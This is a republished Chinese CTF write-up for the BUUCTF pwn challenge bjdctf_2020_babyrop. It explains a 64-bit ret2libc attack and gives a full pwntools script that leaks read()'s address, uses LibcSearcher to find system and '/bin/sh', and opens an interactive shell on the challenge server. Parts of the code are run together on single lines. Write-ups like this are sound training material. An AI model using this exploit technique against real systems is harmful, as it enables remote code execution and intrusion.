[BUUCTF-pwn]——bjdctf_2020_babyrop
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——bjdctf_2020_babyrop
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——bjdctf_2020_babyrop
- 題目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop
還是先checksec 一下
在IDA中看看
利用泄露地址和LibcSearcher庫,找到對應的 libc版本算對偏移就可以找到system函數和 ‘/bin/sh’ 字符串.
因為64位,所以找下pop指令
思路: 泄露任意函數地址, 找到對應libc版本, 利用偏移尋找system函數和 ‘/bin/sh’ 字符串.
exploit
from pwn import * from LibcSearcher import * #p = process("./bjdctf_2020_babyrop") p = remote('node3.buuoj.cn',27183) elf = ELF("./bjdctf_2020_babyrop") context.log_level = 'debug' read_plt = elf.plt['read'] read_got = elf.got['read'] #當然你們也可以泄露puts函數的地址都可以puts_plt = elf.plt['puts']pop_rdi = 0x0400733main_addr = 0x04006AD payload = 'a'*(0x20 + 0x8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr) p.sendlineafter("Pull up your sword and tell me u story!\n",payload) read_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\x00')) print hex(read_addr) libc = LibcSearcher("read", read_addr)libc_base = read_addr - libc.dump("read") sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh")payload = payload = 'a'*(0x20 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) p.sendlineafter("Pull up your sword and tell me u story!\n",payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——bjdctf_2020_babyrop的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——铁人三项(第
- 下一篇: [BUUCTF-pwn]——others